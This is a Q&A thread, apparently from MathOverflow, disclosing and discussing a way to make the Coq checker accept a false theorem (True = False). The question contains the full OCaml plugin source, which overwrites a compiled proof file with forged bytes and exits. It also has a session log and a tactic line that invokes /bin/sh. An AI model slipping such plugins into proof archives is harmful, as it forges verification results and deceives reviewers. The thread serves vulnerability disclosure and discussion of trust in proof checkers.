# Consequences of technically proving anything in Coq (on at least Linux) exploiting a bug?

Tags: proof-theory, formal-proof, mathematical-software, lo.logic

Technically, it is possible to prove **anything** in Coq proof assistant [1] (on at least Linux) due to a programming feature (or bug). This seems tractable when validating large proofs. Human analysis may catch this.

Question:

> What are the consequences of technically proving anything in Coq?

*More or less* the question had in mind dishonest human provers presenting seemingly valid long computer readable proofs.

*Later* Coq developers replied `little hack'. I saw no official plans or replies of breaking the well formed proof (possibly because of backward compatibility being priority).

The basic technical details are: Hostile ocaml plugins (possibly disguised as proofs in FILE.v) can generate their own .vo proofs (of trivial statements), thus subverting coqchk, and don't giving a chance of "coqc" to even see the "anything proof". The plugin does this with exit(2) after writing .vo. This scenario seems interesting when validating large archives.

Here is a sample session, including links to full source code:

```
 joro@j:/tmp/test1$ tar xvf ../proof.tar 
     fib5.v
     bLOB
     joro@j:/tmp/test1$ ls -l
 total 16
 -rwxr-xr-x 1 joro joro 10301 2011-05-03 12:53 bLOB
 -rw-r--r-- 1 joro joro   125 2011-05-03 12:53 fib5.v
 joro@j:/tmp/test1$ coqc fib5.v 
     Trivially true. coqchk may pass
     joro@j:/tmp/test1$ ls -l
 total 24
 -rwxr-xr-x 1 joro joro 10301 2011-05-03 12:53 bLOB
 -rw-r--r-- 1 joro joro    51 2011-05-03 12:55 fib5.glob
 -rw-r--r-- 1 joro joro   125 2011-05-03 12:53 fib5.v
 -rw------- 1 joro joro   812 2011-05-03 12:55 fib5.vo
 joro@j:/tmp/test1$ coqchk fib5
     Welcome to Chicken 8.2pl1 (February 2010)
     [intern /tmp/test1/fib5.vo ... done]
     ...snip...
     Checking library: fib5
     *** vo structure validated ***
       checking cst: <>.fib5.thm1
       checking cst: <>.fib5.really
     Modules were successfully checked
     joro@j:/tmp/test1$cat fib5.v
 Theorem thm1: True.
 Proof.
   auto.
 Qed.
 Declare ML Module "bLOB" .
 Theorem really: True = False.
 Proof.
   intuition.
 Qed.
 #note: there is a zero byte at the end of "bLOB". in addition "bLOB" may be "aux.v" 
 joro@j:/tmp/test1$ coqchk -v
 The Coq Proof Checker, version 8.2pl1 (February 2010)
 compiled on Feb 27 2010 16:09:50
```

to compile the plugin:
ocamlopt -o bLOB -shared a.ml

the plugin writes valid but unrelated .vo proof and then does exit(2) to prevent coqc from analyzing the "anything proof".

a.ml is [here](http://j.ludost.net/blog/misc/a.ml). 
tar with the proof is [here](http://j.ludost.net/blog/misc/proof.tar)

Possibly the most likely exploit scenario is:

Here is a proof of X consisting of about $10^5$ files. lemma2817.v is the plugin and it doesn't stop the final proof.

[1] http://coq.inria.fr/

(crossposted on M.SE)

**UPDATE**: a.ml (OCAML) here:

```
    open Printf;;
    (* #load "unix.cma";; *)
    (* compile: ocamlopt -o bLOB -shared a.ml*)
    open Unix;;
    let x = 1 + 2 ;;
    printf "Trivially true. coqchk may pass\n";;
    let fd = Unix.openfile "./fib5.vo" [O_RDWR ; O_CREAT] 0o600 in
    ftruncate fd 0 ;
    write fd "\x00\x00\x20\x08\x84\x95\xa6\xbe\x00\x00\x02\xef\x00\x00\x00\xe6\x00\x00\x02\xbe\x00\x00\x02\x91\xd0\xa0\x24\x66\x69\x62\x35\x40\xc0\x04\x03\xd0\x90\xa2\xb0\x42\x24\x66\x69\x62\x35\x40\xa0\xa0\x24\x74\x68\x6d\x31\x90\xf0\x40\x90\x90\x90\x9c\xa0\xa0\xb0\x90\xa0\x25\x4c\x6f\x67\x69\x63\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x40\x24\x54\x72\x75\x65\x40\x41\x90\x9b\xa0\x04\x0c\x40\x90\x90\x40\x40\x41\x40\xa0\xa0\x26\x72\x65\x61\x6c\x6c\x79\x90\xf0\x40\x90\x90\x90\x9c\xa0\xa0\xb0\x90\xa0\x04\x19\xa0\x04\x18\xa0\x04\x17\x40\x40\x04\x16\x40\x41\x90\x9b\xa0\x04\x08\x40\x90\x90\x40\x40\x41\x40\x40\x40\x40\x40\x40\xa0\xa0\xa0\x2a\x4c\x6f\x67\x69\x63\x5f\x54\x79\x70\x65\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x30\x5f\xb0\x16\xdd\x26\xc4\x94\xf9\x07\x89\x51\x91\x03\xf1\xd3\x06\xa0\xa0\xa0\x27\x50\x72\x65\x6c\x75\x64\x65\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x30\x3f\x7c\xa2\x88\x4a\x72\x6c\x12\x85\x67\x03\x1c\x07\xf8\x24\x86\xa0\xa0\xa0\x27\x54\x61\x63\x74\x69\x63\x73\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x30\x27\xf0\x1f\x3c\xa4\x0a\x05\x89\x0c\xe5\xc4\xb6\x96\xec\x49\x5a\xa0\xa0\xa0\x22\x57\x66\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x30\xb0\xd6\xf6\x26\x6c\xdd\x54\x3f\x23\x97\x33\x9e\xa3\xec\x62\xf1\xa0\xa0\xa0\x25\x50\x65\x61\x6e\x6f\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x30\x07\x94\x7b\x89\xa1\x80\xa3\x50\xc0\x48\x2e\xb7\x0c\x6b\xf3\x1e\xa0\xa0\xa0\x26\x53\x70\x65\x63\x69\x66\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x30\x0d\x59\x83\x8d\x26\x27\x56\x53\x31\x41\x6b\x00\x71\x08\x50\x6b\xa0\xa0\xa0\x29\x44\x61\x74\x61\x74\x79\x70\x65\x73\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x30\xb6\x9e\x13\xbf\x29\x8c\x28\xd9\xe1\x77\xc9\x93\xca\xdf\xae\xfb\xa0\xa0\xa0\x04\x62\xa0\x04\x61\xa0\x04\x60\x40\x30\x10\xcd\x50\xdb\x7b\x31\x4d\xb5\xd1\x18\x3f\x03\x19\xfa\xda\x1d\xa0\xa0\xa0\x29\x4e\x6f\x74\x61\x74\x69\x6f\x6e\x73\xa0\x24\x49\x6e\x69\x74\xa0\x23\x43\x6f\x71\x40\x30\xf0\xb3\xe5\xfb\x02\x4b\x8f\x8c\xdb\x44\x61\x6d\x64\x44\x74\x0c\x40\x40\xb0\x04\x7f\xa0\xa0\x04\x7d\xa0\x28\x43\x4f\x4e\x53\x54\x41\x4e\x54\xb0\x90\x91\xa0\x94\x90\x41\x40\x40\x92\x40\xa0\xa0\x22\x5f\x37\xa0\x29\x49\x4d\x50\x4c\x49\x43\x49\x54\x53\xa0\xa0\xb0\x92\x04\x93\x40\x04\x8f\xe0\x40\x41\x40\x40\x40\x40\xa0\xa0\x91\x04\x06\x40\x40\xa0\xa0\x22\x5f\x38\xa0\x24\x48\x45\x41\x44\xa0\x91\x04\x0d\x90\x90\x04\x0f\xa0\xa0\x22\x5f\x39\xa0\x2f\x41\x52\x47\x55\x4d\x45\x4e\x54\x53\x2d\x53\x43\x4f\x50\x45\xb0\x40\x91\x04\x16\x40\xa0\xa0\x04\x8c\xa0\x04\x28\xb0\x04\x27\x40\x92\x40\xa0\xa0\x23\x5f\x31\x30\xa0\x04\x22\xa0\xa0\xb0\x04\x21\x40\x04\x96\x04\x20\xa0\xa0\x91\x04\x04\x40\x40\xa0\xa0\x23\x5f\x31\x31\xa0\x04\x1f\xa0\x91\x04\x0a\x90\x90\x04\x0c\xa0\xa0\x23\x5f\x31\x32\xa0\x04\x1e\xb0\x40\x91\x04\x12\x40\x40\x40\xa0\xa0\x04\x4f\x04\x49\xa0\xa0\x04\x57\x04\x54\xa0\xa0\x04\x62\x04\x5c\xa0\xa0\x04\x6d\x04\x67\xa0\xa0\x04\x78\x04\x72\xa0\xa0\x04\x83\x04\x7d\xa0\xa0\x04\x8e\x04\x88\xa0\xa0\x04\x99\x04\x93\xa0\xa0\x04\xa4\x04\x9e\x40\xa0\x04\x60\xa0\x04\x70\xa0\x04\x7a\xa0\x04\x84\xa0\x04\x8e\xa0\x04\x98\xa0\x04\xa2\xa0\x04\x6d\xa0\x04\xad\x40\x84\x95\xa6\xbe\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x04\x30\x92\x3c\xc2\xa2\xba\xb3\x7b\x2f\x1b\xe7\xea\x03\x44\x0e\x9f\x1b" 0 812 ;
    exit 4 ;;
```

**Update** Possibly a more portable solution (Coq):

```
Theorem really: True = False.
Proof.
  external "/bin/sh" "ESCAPE_SEQ; write_vo_proof; nicely_kill_coq ;" True.
  (* this invokes /bin/sh *)
Qed.
```

[tactic external](http://coq.inria.fr/V8.2pl1/refman/Reference-Manual012.html)

Comment: There is something called HOL Zero which tries to circumvent all methods of deviance. http://proof-technologies.com/holzero.html

Comment: @Junkie: you mean coqc and coqchk shouldn't be trusted at all?

Comment: While the Calculus of Constructions is certainly appropriate material for mathoverflow, this question is relevant only to one specific implementation (Coq).  As such, it isn't really a math question (or even a computer science question, for that matter!).  Please file a bug on the coq bug tracker.  Vote to close.

Comment: This question amounts to a quite peculiar use of MO.

Comment: Didier: you're not the only one who thinks so. Meta thread: http://tea.mathoverflow.net/discussion/1037/consequences-of-technically-proving-anything-in-coq-on-at-least-linux-exploiting-a-bug/#Item_0 

Comment: @Todd: Indeed. Thanks for the link. (Unrelated: maybe try to add this @ thing to your comments, I only got yours by chance.)

Comment: @Didier Piau: Regarding your 'unrelated'. I strongly believe, the @ has no effect on this site (in contrast to some similar sites, as this one uses an older version of the underlying software). 

Comment: @unknown Hmmm... OK, thanks. Then this means I am notified of no comment at all.

Comment: @joro: Yes, you'd get a reward if you could show |- true <=> false.  See the HOL Zero webpage for more info and the download.  It has no warranty (it has GPL3 licence), as is usual for all software I think.  It would be somewhat foolhardy to give out free software and accept warranty!  Be happy with $100!

Comment: @Mark btw, what are the best automatic proof generators? Isabelle's sledgehammer doesn't seem very powerful.

Comment: @joro: It depends on the kind of formal logic that it's for. There are various dedicated SAT solvers (for propositional logic only), many are dedicated to first-order logics (I understand that Vampire is supposed to be amongst the best), and then those for more expressive, higher-order logics (like HOL, Isabelle, Coq and PVS). In the hands of a sufficiently expert user, all the main "higher-end" systems can be used very effectively, but the trouble is there are only a handful of "sufficiently expert" users (and I am not one!). I'm afraid I don't know which are powerful but very easy to use.

Comment: http://homepages.inf.ed.ac.uk/rpollack/export/believing.ps.gz
How to believe a machine-checked proof. In G. Sambin and J. Smith,
editors, Twenty Five Years of Constructive Type Theory. Oxford Univ.
Press, 1998

Comment: I have voted to reopen. Coq bugs are in current news.

Comment: @JoelDavidHamkins Thanks. I don't care about reopening. Would you please give reference for the Coq news? (to save me search time). Btw, if you care about reopening you might consider editing the question and bumping it.

Comment: I heard about https://github.com/clarus/falso from Richard Zach https://plus.google.com/u/0/+RichardZach/posts/CFQJQSQtmRd.

Comment: @JoelDavidHamkins I don't have google account so can't see your second link. If you read the coq mailing list, you will see many bugs like the first link. One of the reasons I asked this is "computers know better", which is closely related to Technological **singularity** http://en.wikipedia.org/wiki/Technological_singularity

Comment: Richard had just posted a link to the first link. (And you don't generally need a Google account to see G+ posts, but I  notice that Richard had only shared that privately.)

Comment: @JoelDavidHamkins If "news" have few than 10^6 impressions per day, I don't consider it "current news", might be wrong on this :)

Comment: I had just meant that it was circulating on G+ with Richard's post. I didn't mean any big deal about "news".

Comment: @JoelDavidHamkins If you are interested in this, you might consider asking something close to this. Probably fewer people will to vote close a person of your reputation ;)

Answer (score 60):

For the innocent observers, let me explain what joro did. He has tricked Coq into thinking that `True = False` is a theorem by providing an external piece of code (i.e., something that Coq does *not* check but simply loads into memory) that breaks Coq loading mechanism. This of course should not happen, Coq should realize that it's loading corrupted external code.

Thus, we do not have here a straight inconsistency in the Coq theorem prover, but rather a way of breaking Coq through its interaction with the external environment. There are in fact many ways in which this can be done, such as:

1. Expose the computer to cosmic rays that cause the CPU to malfunction occasionally. (If you think this is a joke you should read what sort of ideas computer security experts have.)
2. Coq depends on the runtime environment of the operating system and an extensive runtime library (to manipulate memory, strings, to communicate with the user, etc.) which is almost never bug-free. Any such bugs can in principle be used to make Coq think it proved something senseless.
3. If the CPU has bugs then you cannot trust the execution of *any* program. (Who remembers the Intel Pentium division bug? Did it stop us from using computers?)
4. If the compiler which was used to compile Coq has bugs, you cannot trust Coq to work correctly.

These are all valid concerns, some more than others. People put serious thought into making sure that their theorem provers work correctly. In particular, I think there is an ongoing effort to formally prove that the Coq core algorithm does what it is supposed to do. It is hard enough to deal with the core algorithm, let alone consider what happens when people start linking in external libraries.

Now to answer joro: I think you can trust Coq more than you can trust the average mathematician. The biological equivalent of what you did to Coq would be to give a mathematician an illegible photocopy of a paper with results that he relies on to prove theorems. If you want to trust your Coq code then you can take several precautions:

1. Make sure you do not use any external libraries or experimental features. (You can syntactically check whether the Coq code links in any modules or uses certain experimental features.)
2. Run your Coq code on several different operating systems.
3. Run your Coq code on a computer in a vault inside a mountain to prevent cosmic rays from reaching your computer (and don't put any radioactive bananas inside the computer either).
4. Think about what Coq is proving and see whether it makes sense. After all, your brain is not totally clueless about math and it should be able to assess what level of credence the results deserve. (If you're proving with Coq 30000 small theorems which all look alike that's a different matter. Your brain is useless then.)
5. Ask other people to prove the same result, but do not tell them how you did it. Compare notes.

Always remember that mathematics (still) is a human activity. Even if we use machines to do it.

Comment: I would never have expected to see "radioactive bananas" in an answer to a MO question :-D  +1.

Comment: Andrej, 10x. I continue to fail to see what is the point of using a proof assistant when human must check the validity of the proof (because of historic counterexamples)? FYI I have nothing against Coq.

Comment: @joro: There are degrees of trust, it's not a binary thing. You can trust *most* of Coq to a *high* degree. Just because you discovered a way to create a bug (by rather hackish methods, I should say), that does not strip Coq of all of its validity. How does your standard of trusting Coq differ from your standard of trusting human-generated published proof? You seem to think that if a human checks a very long Coq proof something will be gained. I wouldn't really trust any group of humans to check several tens of thousands lines of code, it's just too boring to do it.

Comment: @Andrej 10x. Assuming a dishonest human prover giving Coq proofs, what are the degrees of trust for Coq results?

Comment: So you should distrust the dishonest man, not Coq.

Comment: joro raises a valid vulnerability here, and should be congratulated on finding it.  He also asks an extremely valid question about "assuming a dishonest human prover giving Coq proofs ...".  If formal proof ever becomes really big, then there will be subcontractors paid to perform it, and realistically there will be some who will try to cheat.  Equating such worries with the old chestnut about cosmic rays is sweeping this important issue under the carpet.
But read my answer to the following:
http://mathoverflow.net/questions/18421/how-do-they-verify-a-verifier-of-formalized-proofs/51495#51495

Comment: @Mark: I was not trying to equate joro's concern with cosmic rays, I just wanted to point out that there are many ways in which a theorem prover can fail, some of which are caused by Mother Nature. But my main point is that concerns about correctness of formal proofs should always be compared with similar concerns about humans. I don't see anyone on MO asking "What if there are errors in published proofs?" because everyone knows that there are errors in published proofs (probably a great deal many more than we would like to believe). Humans are gregarious animals, we rely on each other, so ...

Comment: ... so we build our society and networks in a way that sacrifices safety for efficiency. We rely on people being honest. This is why we find a discussion of the sort "what if a subcontractor is dishonest about proofs" irrelevant. Theorem provers are not here to protect us from mathematical conmen, but are here to *help* mathematicians. So, by all means joro should file a bug report, but I think he should not be concerned about "Coq losing all value" in face of a bug, unless he is prepared to declare that all published mathematics has lost all value because it is not all correct.

Comment: And by the way, I find it likely that joro found a bug in the Ocaml dynamic linking library, not in actual Coq. He should make sure to see whether the bug must be reported to Coq or to Ocaml development team.

Comment: @Andrej: coq developers are aware of this `feature'. The little i understood from their legalese language was "nice little hack". FYI i would suppose there is a reliable exploit without dynamic libraries. Stay assured the original exploit does not exploit OCAML bug, it is Coq only.

Comment: @Andrej: I generally agree with the thrust of what you are saying - using theorem provers greatly improves mathematical rigour, and we can never be 100% certain. But we can do better than just accept that we must trust their users. With the right approach to building theorem provers, vulnerabilities can be effectively eliminated, regardless of whether the users are being trusted or not (although we still must do the human process of checking that the right theorem has been proved). This is especially useful if highly complex automated theorem prover routines are being used. ...

Comment: ... So with the right approach we can have the best of both worlds - safety and efficiency. Robin Milner's "LCF-style" architecture for theorem provers (used in Coq and other systems) was a massive leap in the right direction, greatly improving the trust we can put in systems. Unfortunately since then complacency about trust has pervaded theorem prover development. Observations like joro's should be taken very seriously, but sadly aren't.

Comment: @Joro: By the way, find something like this in my (admittedly very basic) theorem prover, HOL Zero, and you'll get a $100 reward!

Comment: @Mark: when writing msgs to me, please put them in posts of mine - @-stuff doesn't seem to work here. would i be eligible for the reward if i code in HOL Zero a genuine (future) proof of T=F?. btw, i am not familiar with your product, what license **warranty** does it promise ;)

Comment: @joro: Ok so my reply is in a comment to your original question.

Comment: I think we're all mostly agreeing, even though the comments make it look like we are not. I agree with Mark that designers of theorem provers should take correctness very, very seriously. If by some luck of destiny they go mainstream (either in mathematics or in computer science), everyone will accept theorem provers as de facto standard for establishing truth. I think we really want to avoid the situation where someone will be able to sell "theorem prover anti-malware software". I hear there is software for CAD systems that corrects errors in CAD designs that were caused by numerical errors.

Comment: @Andrej: Yes, we're largely agreeing.  I think for everyday usage by mathematicians, the trustworthiness of LCF-style theorem provers like Coq, Isabelle, HOL Light, HOL4, etc is already perfectly acceptable (let's hope it stays that way).  But for the most important applications, e.g. verifying critical software or reviewing mathematical journal submissions, some rigorous process of independently auditing a proof, to check that the right theorem has been proved, will be required; and having some sort of highly trustworthy auditing tool (or "anti malware"!) to support this would be very useful.

Comment: things might get complicated if computers generate more long proofs. iirc it already happened human simplifying computer generated proof - maybe the Robbinson's problem for sthg boolean. a proof of real size say 4GB might be intractable for even a large team.

Comment: Yes - and that's why we need "black-box" proof auditing, where you just examine the statement of the resulting proved theorem and the axioms used in its proof, and don't need to look at the 4GB proof script itself.  But for this you need a theorem prover that you can trust to make sound deductions, record all axioms and print theorems correctly, with no dodgy architectural back-doors.  There was no theorem prover that does all of these things, so I wrote the basic HOL Zero that does, for reading in proofs exported from more sophisticated systems so that they can be black-box proof audited.

Comment: http://homepages.inf.ed.ac.uk/rpollack/export/believing.ps.gz
How to believe a machine-checked proof. In G. Sambin and J. Smith,
editors, Twenty Five Years of Constructive Type Theory. Oxford Univ.
Press, 1998

Answer (score 6):

> What are the consequences of technically proving anything in Coq?

This is a question in the [Coq faq](http://coq.inria.fr/faq?som=2#htoc7).

Comment: It's good that the Coq FAQ has this list of 5 things that you trust when using Coq, but where in this list is the vulnerability highlighted above by joro?  It's not really covered by the second item, "The Coq kernel implementation", because this only talks about mirroring the logic...